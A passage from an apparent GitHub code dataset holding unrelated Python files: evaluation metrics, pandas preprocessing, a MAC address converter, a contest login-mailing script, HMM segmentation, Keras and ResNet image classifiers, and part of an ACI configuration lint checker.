(precision_value[0]/float(precision_value[0]+precision_value[1]))\n except ZeroDivisionError:\n pstrict = 0\n try:\n plax =(precision_value[2]/float(precision_value[2]+precision_value[3]))\n except ZeroDivisionError:\n plax = 0\n try:\n rstrict= (recall_value[0]/float(recall_value[0]+recall_value[1]))\n except ZeroDivisionError:\n rstrict = 0\n try:\n rlax=(recall_value[2]/float(recall_value[2]+recall_value[3]))\n except ZeroDivisionError:\n rlax = 0\n if (pstrict+rstrict) == 0:\n fstrict = 0\n else:\n fstrict=2*(pstrict*rstrict)/(pstrict+rstrict)\n if (plax+rlax) == 0:\n flax=0\n else:\n flax=2*(plax*rlax)/(plax+rlax)\n\n log_function('\\n=========================\\n')\n log_function('total results:')\n log_function('recall strict: ',end='')\n log_function(rstrict)\n log_function('recall lax: ',end='')\n log_function(rlax)\n log_function('')\n\n log_function('precision strict: ',end='')\n log_function(pstrict)\n log_function('precision lax: '),\n log_function(plax)\n log_function('')\n \n log_function('f1 strict: ',end='')\n log_function(fstrict)\n log_function('f1 lax: ',end='')\n log_function(flax)\n log_function('')\n","repo_name":"rsennrich/Bleualign","sub_path":"bleualign/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","stars":277,"dataset":"github-code","pt":"81"} +{"seq_id":"19861611711","text":"# import libraries\r\nimport 
pandas as pd\r\n\r\n# function to import data\r\ndef import_data(path_books:str,\r\n path_ratings:str,\r\n path_book_tags:str,\r\n path_tags:str\r\n ):\r\n \r\n '''\r\n Function to import data.\r\n \r\n Takes as input the path where the CSVs are located.\r\n \r\n Returns 4 dataframes.\r\n \r\n '''\r\n \r\n #load books dataset\r\n books = pd.read_csv(path_books)\r\n \r\n #load ratings dataset\r\n ratings = pd.read_csv(path_ratings)\r\n \r\n #load book tags dataset\r\n book_tags = pd.read_csv(path_book_tags)\r\n \r\n #load tags dataset\r\n tags = pd.read_csv(path_tags)\r\n \r\n return books, ratings, book_tags, tags\r\n\r\n\r\n# function to preprocess data\r\ndef preprocess_data(ratings:pd.DataFrame,\r\n books:pd.DataFrame,\r\n book_tags:pd.DataFrame,\r\n tags:pd.DataFrame\r\n ):\r\n \r\n '''\r\n Function to pre process data.\r\n \r\n Takes as input the 4 dataframes.\r\n \r\n Return 1 finalized dataframe, with all desired info merged, \r\n the cosine similarities regarding tags and a dict with title indexes.\r\n \r\n '''\r\n \r\n ###############################\r\n # ratings & books #\r\n ###############################\r\n \r\n # drop duplicates from ratings table\r\n ratings.drop_duplicates([\"user_id\",\"book_id\"], inplace = True)\r\n \r\n # drop duplicates from books table\r\n books.drop_duplicates([\"original_title\"], inplace = True) \r\n \r\n # drop unwanted columns\r\n books = books.drop(['best_book_id', 'work_id', 'books_count', 'isbn', 'isbn13', 'language_code', 'work_ratings_count', 'work_text_reviews_count', 'image_url', 'small_image_url'], axis=1, errors='ignore')\r\n \r\n # drop duplicates from books table\r\n books.drop_duplicates('title', inplace=True)\r\n \r\n # find rows with NaN values and drop them from both tables\r\n books_with_nan = books.isnull().any(axis=1)\r\n \r\n for index, row in books[books_with_nan].iterrows():\r\n ratings = ratings[ratings.book_id != row.book_id]\r\n \r\n # drop NAs based on title\r\n books.dropna(subset=['original_title'], inplace=True)\r\n \r\n # compute percentages of positive ratings, negative ratings, average ratings\r\n books['ratings_count_new'] = books.ratings_1 + books.ratings_2 + books.ratings_3\\\r\n + books.ratings_4 + books.ratings_5\r\n \r\n books['per_positive_ratings'] = round((books.ratings_4 + books.ratings_5)/ books.ratings_count_new,3)*100\r\n books['per_negative_ratings'] = round((books.ratings_1 + books.ratings_2)/ books.ratings_count_new,3)*100\r\n books['per_average_ratings'] = round((books.ratings_3)/ books.ratings_count_new,3)*100\r\n \r\n ###############################\r\n # book_tags & tags #\r\n ###############################\r\n \r\n tags_merged = pd.merge(book_tags, \r\n tags, \r\n how='left',\r\n left_on='tag_id',\r\n right_on='tag_id')\r\n\r\n # group the data by name and aggregate the tagValue values\r\n grouped_tags = tags_merged.groupby('goodreads_book_id').agg({'count':'sum','tag_name': lambda x: ', '.join(x)})\r\n\r\n # reset the index to make name a column again\r\n grouped_tags = grouped_tags.reset_index()\r\n\r\n\r\n #rename column\r\n grouped_tags = grouped_tags.rename(columns={'goodreads_book_id':'id','count':'total_number_of_tags'})\r\n \r\n # merge books and tags\r\n books_tags_merged = pd.merge(books, \r\n grouped_tags, \r\n how='inner',\r\n left_on='id',\r\n right_on='id')\r\n \r\n ###############################\r\n # final format of data #\r\n ###############################\r\n \r\n # drop unwanted columns\r\n df = 
books_tags_merged.drop(['book_id','title','ratings_count','ratings_1','ratings_2','ratings_3','ratings_4','ratings_5'], \\\r\n axis=1, errors='ignore')\r\n \r\n # set title as index\r\n df = df.set_index('id')\r\n\r\n return df\r\n \r\n\r\n\r\n","repo_name":"michaliskarampasis/msc_data_science_aueb","sub_path":"q5_recommender_systems/2_content_based_rec_sys/functions/import_and_preprocess_initial_data.py","file_name":"import_and_preprocess_initial_data.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4083400658","text":"#!/bin/env python\nimport argparse\n\ndef convert(MACaddress):\n if MACaddress.rfind(':') > 0:\n lconvert = lambda mac: '.'.join(MACaddress.replace(':', '')[i:i+4] for i in range(0, 12, 4))\n return lconvert(MACaddress)\n elif MACaddress.rfind('-') > 0:\n lconvert = lambda mac: '.'.join(MACaddress.replace('-', '')[i:i+4] for i in range(0, 12, 4))\n return lconvert(MACaddress)\n elif MACaddress.rfind('.') > 0:\n lconvert = lambda mac: ':'.join(MACaddress.replace('.', '')[i:i+2] for i in range(0, 12, 2))\n return lconvert(MACaddress)\n else:\n return MACaddress\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"MACaddr\",\n help=\"MAC address to convert\")\n args = parser.parse_args()\n if args.MACaddr is not None:\n print(convert(args.MACaddr))\n else:\n print(\"No MAC address provided\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"micedwards/NetworkSnippets","sub_path":"remac.py","file_name":"remac.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71079410186","text":"from email.message import EmailMessage\nimport time\nimport smtplib\n\nfrom db import *\nfrom my_mail import *\nfrom urls import *\n\n\ndef gen_msg(member):\n res = \"\"\n res += \"Здравствуйте, %s!\\n\" % member.nickname\n res += \"\\n\"\n res += \"Ваши данные от тестирующей системы:\\n\"\n res += \"Логин: %s\\n\" % member.login\n res += \"Пароль: %s\\n\" % member.password\n res += \"Ссылка на тестирующую систему: \" + URL_CF_JUNIOR + \"\\n\"\n res += \"Чат в Telegram: \" + URL_TG_JUNIOR + \"\\n\"\n res += \"\\n\"\n res += \"С уважением, Максим Инютин\\n\"\n return res\n\n\ndef send_mail(smtp_server, member, verbose=True):\n msg = EmailMessage()\n msg.set_content(gen_msg(member))\n msg[\"Subject\"] = \"Доступ на Codeforces\"\n msg[\"From\"] = my_email\n # msg[\"To\"] = \", \".join(emails.split(\";\"))\n msg[\"To\"] = member.email\n smtp_server.send_message(msg)\n if verbose:\n print(\"Отправлено письмо\", member.nickname, member.email)\n time.sleep(5)\n\n\ndef send_cf_teams(smtp_server, verbose=True):\n pg = make_session()\n cursor = pg.execute('SELECT * FROM \"Teams\"').all()\n for team in cursor:\n print(team.teamname)\n\n\ndef send_cf_junior(smtp_server, verbose=True):\n pg = make_session()\n cursor = pg.execute('SELECT * FROM \"Members\"').all()\n for member in cursor:\n if member.mail_sent or member.login is None:\n continue\n send_mail(smtp_server, member, verbose=verbose)\n db_member = pg.get(Member, member.id)\n db_member.mail_sent = True\n pg.commit()\n\n\ndef send_cf(mode=\"teams\", verbose=True):\n smtp_server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n smtp_server.starttls()\n smtp_server.login(my_email, my_pass)\n if mode == \"teams\":\n send_cf_teams(smtp_server, verbose=verbose)\n elif mode == \"junior\":\n send_cf_junior(smtp_server, 
verbose=verbose)\n smtp_server.quit()\n","repo_name":"EngineerXL/ol-parser","sub_path":"mailing.py","file_name":"mailing.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8950248188","text":"'''\n'''\n\nimport numpy as np\nfrom hmmlearn import hmm\n\n# hmm parameters\nMIN_COMP = 2\nMAX_COMP = 4\nNUM_REPS = 25\n\n# smoothing - num. lines\nmax_short_len = 12\n\n# muliplier on median time since to call breaks\nmedian_fold_break = 8\n\nMAX_SEGMENTS = 15\n\n'''\n HMM segmentation\n'''\ndef transform_multinomial(data):\n # converts data into int indices\n unique_bs = set(data.ravel())\n b_to_i = {b: i for i, b in enumerate(unique_bs)}\n train_data = [b_to_i[b] for b in data]\n train_data = np.array(train_data).reshape(-1, 1)\n return train_data\n\n\ndef segment_multinomial_hmm(train_data):\n train_data = transform_multinomial(train_data)\n num_symbols = len(set(train_data.ravel()))\n\n best_zs = []\n best_aic = np.inf\n for nc in range(MIN_COMP, MAX_COMP):\n for rep in range(NUM_REPS):\n model = hmm.MultinomialHMM(n_components=nc)\n model.fit(train_data)\n\n zs = model.predict(train_data)\n log_prob = model.score(train_data)\n\n num_params = (nc-1) + nc*(nc-1) + (num_symbols-1)*nc\n aic = 2*num_params - 2*log_prob\n\n if aic < best_aic:\n best_aic = aic\n best_zs = zs\n\n return best_zs\n\n\n'''\n Post-processing\n'''\ndef smooth(segs):\n # replace first segment with second segment if too short\n bounds = seg_list_to_list_of_bounds(list(range(len(segs)+1)), segs)\n seg1_len = bounds[0][1] - bounds[0][0]\n if seg1_len <= max_short_len:\n seg2_id = segs[bounds[1][0]]\n segs = [seg2_id]*seg1_len + list(segs[seg1_len:])\n segs = np.array(segs)\n\n # replace last segment with second to last segment if too short\n last_len = bounds[-1][1] - bounds[-1][0]\n if last_len <= max_short_len:\n segl2_id = segs[bounds[-2][0]]\n segs = list(segs[:-last_len]) + [segl2_id]*last_len\n segs = np.array(segs)\n\n # simple for now, detect isolated short runs and replace them with earlier seg\n num_replaced = 0\n for short_len in range(max_short_len, -1, -1):\n window = short_len + 2\n for i in range(len(segs) - window):\n [first, *mid, last] = segs[i : i + window]\n if len(set(mid)) == 1:\n mid_item = mid[0]\n if mid_item != first and mid_item != last:\n # replace\n for k in range(i+1, i+window-1):\n segs[k] = first\n num_replaced += 1\n print(f'Replaced {num_replaced} items by smoothing')\n return segs\n\n\ndef combine_bounds(bounds, max_indiv_len = 16):\n # max_indiv_len: if greater than this, do not combine\n new_bounds = []\n comb_to_indiv = {}\n i = 0\n bound_len = lambda b: b[1] - b[0]\n\n while i < len(bounds):\n if bound_len(bounds[i]) <= max_indiv_len:\n j = i + 1\n while j < len(bounds) and bound_len(bounds[j]) <= max_indiv_len:\n j += 1\n cbound = (bounds[i][0], bounds[j-1][1])\n comb_to_indiv[len(new_bounds)] = list(range(i, j))\n new_bounds.append(cbound)\n i = j\n else:\n comb_to_indiv[len(new_bounds)] = [i]\n new_bounds.append(bounds[i])\n i += 1\n\n return new_bounds, comb_to_indiv\n\n\ndef split_breaks(segs, time_sinces, dp_idxs):\n # Split segments by breaks (large time gaps)\n bounds = seg_list_to_list_of_bounds(dp_idxs, segs)\n\n bs = []\n for bound in bounds:\n ts = time_sinces[bound[0] : bound[1]]\n break_threshold = np.median(ts) * median_fold_break\n break_idxs = [i for i, t in enumerate(ts) if t > break_threshold]\n new_bounds = [bound[0]] + [bound[0] + bi for bi in break_idxs] + 
[bound[1]]\n\n for i in range(1, len(new_bounds)):\n bs.append((new_bounds[i-1], new_bounds[i]))\n \n return list_of_bounds_to_seg_list(bs)\n\n\n'''\n Data structure\n'''\ndef seg_list_to_list_of_bounds(idxs, segs):\n # List of N ints -> List of segments by boundary changes\n i = 0\n bounds = []\n while i < len(segs):\n j = i + 1\n while j < len(segs) and segs[j] == segs[i]:\n j += 1\n bounds.append((idxs[i], idxs[j]))\n i = j\n return bounds\n\n\ndef list_of_bounds_to_seg_list(bs):\n # List of segments by boundary changes -> list of N ints\n res = []\n for i, b in enumerate(bs):\n res += [i] * (b[1] - b[0])\n return res\n\n\n'''\n Primary\n'''\ndef segment(df, num_segments=MAX_SEGMENTS):\n '''\n Segments df by time since downpress\n Returns a list of sub dataframes\n '''\n dp_df = df[df['Has downpress']]\n data = dp_df['Time since downpress']\n data = np.array([round(bs, 2) for bs in data])\n dp_idxs = list(dp_df.index) + [len(df)]\n \n segs = segment_multinomial_hmm(data)\n segs = split_breaks(segs, data, list(range(len(data)+1)))\n smooth_segs = smooth(segs)\n\n # bounds are used for summary plotting\n bounds = seg_list_to_list_of_bounds(dp_idxs, smooth_segs)\n # print(bounds)\n print(f'Found {len(bounds)} groups')\n\n # groups (less than 10) are used for chart detail plotting\n groups = bounds\n num_segs = len(groups)\n if num_segs > num_segments:\n max_indiv_len = 4\n while num_segs > num_segments:\n cbs, comb_to_indiv = combine_bounds(bounds, max_indiv_len)\n num_segs = len(cbs)\n max_indiv_len += 1\n groups = cbs\n print(f'Combined into {len(groups)} groups with max. indiv. len {max_indiv_len}')\n else:\n groups = bounds\n comb_to_indiv = {i: [i] for i in range(len(groups))}\n\n all_dfs = []\n for bound in bounds:\n dfs = df.iloc[bound[0]:bound[1]]\n all_dfs.append(dfs)\n \n return all_dfs, groups, comb_to_indiv\n","repo_name":"maxwshen/piu-analysis","sub_path":"src/hmm_segment.py","file_name":"hmm_segment.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"81"} +{"seq_id":"4911958231","text":"import sys\nimport threading\n\n\nclass Node:\n def __init__(self, idx=None):\n self.idx = idx\n self.parent = None\n\n def __repr__(self):\n return f\"{type(self).__name__}(index={self.idx}, parent={self.parent})\"\n\n\nclass Node2:\n \"\"\"Each node knows about its children, not its parent.\"\"\"\n def __init__(self, idx=None):\n self.idx = idx\n self.children = set()\n\n def __repr__(self):\n return f\"{type(self).__name__}(index={self.idx}, children={self.children!r})\"\n\n\ndef compute_height(n, parents):\n # Replace this code with a faster implementation\n max_height = 0\n for vertex in range(n):\n height = 0\n current = vertex\n while current != -1:\n height += 1\n current = parents[current]\n max_height = max(max_height, height)\n return max_height\n\n\ndef find_max_height(node: Node):\n count = 1\n while node.parent is not None:\n node = node.parent\n count += 1\n return count\n\n\ndef max_height(nodes):\n heights = []\n for i in range(len(nodes)):\n heights.append(find_max_height(nodes[i]))\n return max(heights)\n\n\ndef first_approach(n, parents):\n \"\"\"\n Recursive approach which calculate height for each node\n and then return the maximum one.\n \"\"\"\n # initialize list of nodes\n nodes = [Node(i) for i in range(n)]\n\n # connect each node to its parent\n for idx, parent_id in enumerate(parents):\n if parent_id == -1:\n nodes[idx].parent = None\n else:\n nodes[idx].parent = 
nodes[parent_id]\n\n print(max_height(nodes))\n\n\ndef second_approach(n, parents):\n \"\"\"\n In this implementation I went for calculating depth\n from the head node, recursively.\n \"\"\"\n # initialize list of nodes\n nodes = [Node2(i) for i in range(n)]\n\n # connect each node to its parent\n for idx, parent_id in enumerate(parents):\n if parent_id == -1:\n head = nodes[idx]\n else:\n nodes[parent_id].children.add(nodes[idx])\n\n print(compute_depth(head))\n\n\ndef compute_depth(node: Node2):\n if not node.children:\n return 1\n return 1 + max(compute_depth(ch) for ch in node.children)\n\n\ndef main():\n n = int(input())\n parents = list(map(int, input().split()))\n # print(compute_height(n, parents))\n # first_approach(n, parents)\n second_approach(n, parents)\n\n\nif __name__ == \"__main__\":\n # In Python, the default limit on recursion depth is rather low,\n # so raise it here for this problem. Note that to take advantage\n # of bigger stack, we have to launch the computation in a new thread.\n sys.setrecursionlimit(10 ** 7) # max depth of recursion\n threading.stack_size(2 ** 27) # new thread will get stack of such size\n threading.Thread(target=main).start()\n","repo_name":"GreatBahram/dsa","sub_path":"data-structures/week01/assignments/tree_height.py","file_name":"tree_height.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72225866184","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\n# Phân loại cơ bản: Dự đoán ảnh quần áo giày dép\n# Hướng dẫn này dùng tf.keras, một API cấp cao để xây dựng và huấn luyện các mô hình trong TensorFlow.\n\n\n# %%\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import models\n\nfrom tensorflow.keras import Sequential\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(tf.__version__)\n\n\n# %%\n# Tập dữ liệu sau khi được tải sẽ trả về 4 mảng NumPy:\n# 2 mảng train_images và train_labels là tập huấn luyện. Mô hình sẽ học từ dữ liệu của 2 mảng này.\n# 2 mảng test_images vả test_labels là tập kiểm thử. Sau khi mô hình được huấn luyện xong, chúng ta sẽ chạy thử mô hình với dữ liệu đầu vào từ test_images để lấy kết quả, và so sánh kết quả đó với dữ liệu đối ứng từ test_labels để đánh giá chất lượng của mạng neuron.\n# Mỗi ảnh là một mảng NumPy 2 chiều, 28x28, với mỗi pixel có giá trị từ 0 đến 255. 
Nhãn là một mảng của các số nguyên từ 0 đến 9, tương ứng với mỗi lớp quần áo giày dép:\n\n\n# %%\n# import tập dữ liệu về quần áo và giày dép từ Fashion MNIST\n\nfashion_mnist = keras.datasets.fashion_mnist\n\n( train_images , train_labels) , (test_images, test_labels) = fashion_mnist.load_data()\n\nnp.savetxt('train_labels.log' , train_labels , fmt='%s' )\n\nnp.savetxt('train_images.log' , train_images[1] , fmt='%s' )\n\n\n# %%\n# function save the array or img to text\nNUB = 2\nDATA_TEXT = 'data_text'\n\n# print ( train_images[NUB] )\nnp.savetxt( DATA_TEXT + '/text.csv' , train_images[NUB] , fmt='%s' )\n\n# # function save array to img via plt \ndef FUNCTION_SAVE():\n for numb in range(len(train_images)):\n str_a = 'data/'\n str_b = '.png'\n str_a = str_a + str(numb) + str_b\n plt.imsave(str_a , train_images[numb] )\n\n\n# %%\n# khám phá dữ liệu \nprint (\"train_images.shape : \",train_images.shape )\nprint(\"train_image:\" , train_images.size)\nprint (\"train_images[1].size : \",train_images[1].size)\nprint(\"leng : \", len(train_images))\n\n\n# %%\nclass_names = [\n 'Áo thun', \n 'Quần dài', \n 'Áo liền quần', \n 'Đầm', \n 'Áo khoác', \n 'Sandal', \n 'Áo sơ mi', \n 'Giày', \n 'Túi xách', \n 'Ủng']\n\n\n# %%\nfor x in class_names:\n \n print(\" class : \", x)\n\n\n# %%\n# Tiền xử lý dữ liệu\n# Dữ liệu cần được tiền xử lý trước khi được dùng để huấn luyện mạng neuron. Phân tích ảnh đầu tiên trong tập dữ liệu, chúng ta sẽ thấy các pixel có giá trị từ 0 đến 255:\n\n\n# %%\ndef fun_show(x):\n plt.figure()\n plt.imshow(train_images[x])\n plt.colorbar()\n plt.show()\n\nfor x in range(3) :\n fun_show(x)\n\n\n# %%\n# Chúng ta cần tiền xử lý để mỗi một điểm ảnh có giá trị từ 0 đến 1 (có thể hiểu là 0% đến 100%). Để làm điều này, chúng ta chỉ cần lấy giá trị của pixel chia cho 255. Cần lưu ý rằng việc tiền xử lý này phải được áp dụng đồng thời cho cả tập huấn luyện và tập kiểm thử:\n\n\n# %%\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\nplt.imsave(\"train_img.png\", train_images[0] , cmap = plt.cm.binary )\n\n# print (train_images)\n\n\n# %%\nplt.figure(figsize=(10,10))\nfor i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[train_labels[i]])\n plt.imsave(\"train_img.png\", train_images[i] , cmap = plt.cm.binary )\n \nplt.show()\n\n\n# %%\n# Xây dựng mô hình\n# Để xây dựng mạng neuron, chúng tay cần cấu hình các layer của mô hình, và sau đó biên dịch mô hình.\n\n# Thiết lập các layers\n# Thành phần cơ bản của một mạng neuron là các layer. Các layer trích xuất các điểm đặc biệt từ dữ liệu mà chúng đón nhận. Khi thực hiện tốt, những điểm đặc biệt này mang nhiều ý nghĩa và phục vụ cho toán của chúng ta.\n\n# Đa số các mô hình deep learning đều chứa các layer đơn gian được xâu chuỗi lại với nhau. 
Đa số các layer, ví dụ tf.keras.layers.Dense, đều có các trọng số sẽ được học trong quá trình huấn luyện.\n\n\n# %%\n# Thiết lập các layers\nmodel = keras.Sequential([\n keras.layers.Flatten( input_shape = (28, 28) ), \n keras.layers.Dense( 128, activation = 'relu'),\n keras.layers.Dense(10, activation='softmax')\n])\n\n# Biên dịch mô hình\nmodel.compile(\n optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n )\n\n# Huấn luyện mô hình\nmodel.fit(train_images, train_labels, epochs=10)\n\n\n# %%\n# Đánh giá mô hình\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\nprint('\\nTest accuracy:', test_acc)\n\n","repo_name":"mana147/Python-project-computer-vision","sub_path":"Code_Tensorflow/Tensorflow_keras_01.py","file_name":"Tensorflow_keras_01.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28610075525","text":"# -*- coding: utf-8 -*-\r\n\r\n#Train function\r\n\r\nimport os\r\nimport cv2\r\nimport timeit\r\nimport time, math\r\nimport Function as f\r\nimport Image_function as IF\r\nimport pandas as pd\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.applications.imagenet_utils import preprocess_input\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.applications import ResNet50, ResNet101\r\nfrom tensorflow.keras import models, layers, optimizers\r\nfrom tensorflow.keras.layers import Dropout, Conv2D, MaxPooling2D, GlobalAveragePooling2D, BatchNormalization\r\nfrom tensorflow.keras.callbacks import Callback \r\nfrom tensorflow.keras.models import load_model\r\n\r\ndef train_model():\r\n conv_base = ResNet50(weights = 'imagenet',\r\n include_top = False, #whether to include the fully-connected layer at the top of the network.\r\n input_shape = (224, 224, 3))\r\n\r\n conv_base.trainable = True\r\n\r\n model = models.Sequential()\r\n model.add(conv_base)\r\n model.add(GlobalAveragePooling2D())\r\n model.add(layers.Dense(256, activation = 'relu'))\r\n model.add(layers.Dense(128, activation = 'relu'))\r\n model.add(layers.Dense(64, activation = 'relu'))\r\n model.add(layers.Dense(1, activation = 'sigmoid'))\r\n \r\n model.compile(loss='binary_crossentropy', \r\n optimizer= optimizers.Adam (lr = 1e-4, name = 'adam'),\r\n metrics = ['acc'])\r\n \r\n return model\r\n\r\ndef sample_train_data(train_df, train_ratio = 0.7):\r\n\r\n # train is now 75% of the entire data set\r\n # the _junk suffix means that we drop that variable completely\r\n x_train, x_val, y_train, y_val = train_test_split(train_df['Filepath'], \r\n train_df['Label'], \r\n test_size = 1 - train_ratio)\r\n\r\n sub_train_df = pd.DataFrame(columns=['Filepath', 'Label'])\r\n sub_train_df['Label'] = y_train\r\n sub_train_df['Filepath'] = x_train\r\n\r\n sub_val_df = pd.DataFrame(columns=['Filepath', 'Label'])\r\n sub_val_df['Label'] = y_val\r\n sub_val_df['Filepath'] = x_val\r\n \r\n return sub_train_df, sub_val_df\r\n\r\ndef prediction_df(test_df, model): #resize 224\r\n \r\n result_normal = []\r\n result_tb = []\r\n \r\n print('test dataset predicting...')\r\n for index in test_df.index:\r\n \r\n filepath = test_df.Filepath[index]\r\n test_img = cv2.imread(filepath)\r\n \r\n #original prediction\r\n test_img = test_img.reshape((1,) + test_img.shape)\r\n prob = model.predict(test_img)\r\n result_tb.append(prob[0][0])\r\n result_normal.append(1-prob[0][0])\r\n\r\n test_df['Normal_Prob'] = 
result_normal \r\n test_df['TB_Prob'] = result_tb \r\n \r\n return test_df\r\n","repo_name":"xup6YJ/Tuberculosis-Classification","sub_path":"TB_Example/Train_function.py","file_name":"Train_function.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3382190204","text":"import cv2\n\nimg = cv2.imread('DATA/00-puppy.jpg')\n\nwhile True:\n\n cv2.imshow('Puppy',img)\n\n # EXPLANATION FOR THIS LINE OF CODE:\n # https://stackoverflow.com/questions/35372700/whats-0xff-for-in-cv2-waitkey1/39201163\n \n # IF we've waited at least 1 ms AND we've pressed the Esc\n if cv2.waitKey(1) & 0xFF == 27:\n break\n\ncv2.destroyAllWindows()\n","repo_name":"krishnaik06/Computer-Vision-","sub_path":"01-Image-Basics-with-OpenCV/01-Opening-Image-Files-OpenCV.py","file_name":"01-Opening-Image-Files-OpenCV.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"33404575598","text":"# Load the Model\nimport pickle\n\nmodel_file = \"model_C=1.0.bin\"\n\nwith open(model_file, \"rb\") as f_in:\n dv, model = pickle.load(f_in)\n\ncustomer = {\n \"gender\": \"female\",\n \"seniorcitizen\": 0,\n \"partner\": \"yes\",\n \"dependents\": \"no\",\n \"phoneservice\": \"no\",\n \"multiplelines\": \"no_phone_service\",\n \"internetservice\": \"dsl\",\n \"onlinesecurity\": \"no\",\n \"deviceprotection\": \"no\",\n \"techsupport\": \"no\",\n \"streamingtv\": \"no\",\n \"streamingmovies\": \"no\",\n \"contract\": \"month-to-month\",\n \"paperlessbilling\": \"yes\",\n \"paymentmethod\": \"electronic_check\",\n \"tenure\": 1,\n \"monthlycharges\": 29.85,\n \"totalcharges\": 29.85\n}\n\n# turn this customer into a feature matrix\nX = dv.transform([customer])\n\n# probabilty that this customer churns\n\ny_pred = model.predict_proba(X)[0,1]\n\nprint(\"input\", customer)\nprint(\"churn probabilty\", y_pred)\n","repo_name":"froukje/ml-zoomcamp","sub_path":"week5/lecture/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"11111437143","text":"import sys\nfrom acitoolkit.acitoolkit import Tenant, AppProfile, Context, EPG, BridgeDomain\nfrom acitoolkit.acitoolkit import OutsideL3, OutsideEPG, OutsideNetwork\nfrom acitoolkit.acitoolkit import Contract, ContractSubject, InputTerminal\nfrom acitoolkit.acitoolkit import OutputTerminal, Filter, FilterEntry\nfrom acitoolkit.acitoolkit import Credentials, Session\nfrom acitoolkit.acifakeapic import FakeSession\nimport argparse\nimport ipaddress\n\n\nclass Checker(object):\n \"\"\"\n Checker class contains a series of lint checks that are executed against the\n provided configuration.\n \"\"\"\n def __init__(self, session, output, fh=None):\n print('Getting configuration from APIC....')\n self.tenants = Tenant.get_deep(session)\n self.output = output\n self.file = fh\n print('Processing configuration....')\n\n def output_handler(self, msg):\n \"\"\"\n Print(the supplied string in a format appropriate to the output medium.)\n\n :param msg: The message to be printed.\n \"\"\"\n if self.output == 'console':\n print(msg)\n elif self.output == 'html':\n\n color_map = {'Error': '#FF8C00',\n 'Critical': '#FF0000',\n 'Warning': '#FFFF00'}\n\n sev = msg.split(':')[0].split(' ')[0]\n rule = msg.split(':')[0].split(' ')[1]\n descr = msg.split(': ')[1]\n self.file.write(\"\"\"\n 
\n {1}\n {2}\n {3}\n \n \"\"\".format(color_map[sev], sev, rule, descr))\n\n @staticmethod\n def ensure_tagged(objects, tags):\n \"\"\"\n Checks that a set of objects are tagged with at least one tag\n from the set of tags.\n \"\"\"\n for obj in objects:\n tagged = False\n for tag in tags:\n if obj.has_tag(tag):\n tagged = True\n if not tagged:\n return False\n return True\n\n def warning_001(self):\n \"\"\"\n W001: Tenant has no app profile\n \"\"\"\n for tenant in self.tenants:\n if len(tenant.get_children(AppProfile)) == 0:\n self.output_handler(\"Warning 001: Tenant '%s' has no Application \"\n \"Profile.\" % tenant.name)\n\n def warning_002(self):\n \"\"\"\n W002: Tenant has no context\n \"\"\"\n for tenant in self.tenants:\n if len(tenant.get_children(Context)) == 0:\n self.output_handler(\"Warning 002: Tenant '%s' has no Context.\" % tenant.name)\n\n def warning_003(self):\n \"\"\"\n W003: AppProfile has no EPGs\n \"\"\"\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n if len(app.get_children(EPG)) == 0:\n self.output_handler(\"Warning 003: AppProfile '%s' in Tenant '%s'\"\n \"has no EPGs.\" % (app.name, tenant.name))\n\n def warning_004(self):\n \"\"\"\n W004: Context has no BridgeDomain\n \"\"\"\n for tenant in self.tenants:\n contexts = []\n for context in tenant.get_children(Context):\n contexts.append(context.name)\n for bd in tenant.get_children(BridgeDomain):\n if bd.has_context():\n context = bd.get_context().name\n if context in contexts:\n contexts.remove(context)\n for context in contexts:\n self.output_handler(\"Warning 004: Context '%s' in Tenant '%s' has no \"\n \"BridgeDomains.\" % (context, tenant.name))\n\n def warning_005(self):\n \"\"\"\n W005: BridgeDomain has no EPGs assigned\n \"\"\"\n for tenant in self.tenants:\n bds = []\n for bd in tenant.get_children(BridgeDomain):\n bds.append(bd.name)\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if epg.has_bd():\n bd = epg.get_bd().name\n if bd in bds:\n bds.remove(bd)\n for bd in bds:\n self.output_handler(\"Warning 005: BridgeDomain '%s' in Tenant '%s'\"\n \" has no EPGs.\" % (bd, tenant.name))\n\n def warning_006(self):\n \"\"\"\n W006: Contract is not provided at all.\n \"\"\"\n for tenant 